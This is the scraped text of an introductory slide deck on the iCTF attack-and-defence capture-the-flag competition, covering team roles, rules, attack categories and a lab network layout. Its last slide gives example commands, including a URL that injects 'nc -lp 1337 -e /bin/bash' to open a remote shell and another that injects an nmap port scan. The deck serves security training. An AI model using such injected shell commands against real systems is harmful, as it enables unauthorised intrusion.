19
CAPTURE THE FLAG Introductions beer brew man dutchrowboat

CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Embed Size (px)

Citation preview

Page 1: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

CAPTURE THE FLAG

Introductions

beer brew man

dutchrowboat

Page 2: CAPTURE THE FLAG Introductions beer brew man dutchrowboat
Page 3: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Teams

Firewall IDS/IPS Services – Attack and Defense

PHP, Perl, Ruby, Python, Java Analysis

Wireshark, etc. C/ASM Operating System

Apache, OS Configuration, etc.

Page 4: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

iCTF

Came from Defcon iCTF ran by UCSB No test required – just edu “Largest existing live security exercise”

Test Skills of understanding security

Page 5: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

What is it?

A variety of Internet enabled services Services comprised of:

PHP Perl Shell Scripts C++ MySQL Apache/lighttpd SSH XML RPC FTP

Page 6: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

What to do

All services should be protected Patch IPS/IDS

All services should be attacked

Page 7: CAPTURE THE FLAG Introductions beer brew man dutchrowboat
Page 8: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Blender

SNAT with weights?

Is it real?

Page 9: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Rules

No DOS All traffic is penalized Must stay on internal network

Don't prevent legitimate traffic

Don't break rules If attack service, don't launch DOS

from compromised machine

2005 Defcon – hack the scorebot

Page 10: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Attack Techniques

• Buffer overflows • Format string attacks • Shell attacks • Race conditions • Misconfigurations • Authentication attacks • Web-based attacks

Directory traversal Cookie-based services Cross-site scripting Server-side applications

• Lack of parameter validation (e.g., SQL injection)

Page 11: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Skills Scanning • Firewalling • Intrusion Detection • Vulnerability analysis • For each type of vulnerability

How to identify a vulnerability How to exploit a vulnerability How to patch a vulnerability

(without disrupting the get/set flag methods) How to detect a vulnerability

• For each service How to monitor the requests to a service How to monitor the execution of a request Protocol security analysis Application security analysis

Page 12: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Vigna's Suggestions

Have a structured team with clear responsibilities The Perl/Python/PHP group The SQL/database group The flaw-finder group The firewall group The IDS group The C-based exploit group

• Have a leader responsible for coordination and integration • Have a way to intercept socket connections and apply

regexes/substitutions • Have vulnerability analysis tools handy • Have a “human IDS” • Remember: the game lasts only a few hours

Page 13: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Not the first time…

Page 14: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

2009

Page 15: CAPTURE THE FLAG Introductions beer brew man dutchrowboat
Page 16: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Questions?

http://athena.uccs.edu/ictf

Page 17: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Backups…

Page 18: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Test Network

Real Network

Image 10.10.1.2

10.10.1.3Vuln

10.10.1.4Team

Hub

Team Box10.10.1.1

Mon Box10.10.1.x

AttackBoxes

Console for Fixes

Image Test Box

VulnPatch Test

VulnAttack Box

UCCSBoxes

UCCSBoxes

Page 19: CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Some Examples

echo GET / | nc 10.110.134.123 80 > ./myoutput.txt

http://10.100.134.77/users/[email protected]?command=nc -lp 1337 -e /bin/bash

http://10.100.134.77/users/[email protected]?command=nmap -p 1-65535 10.120.134.222 > port.txt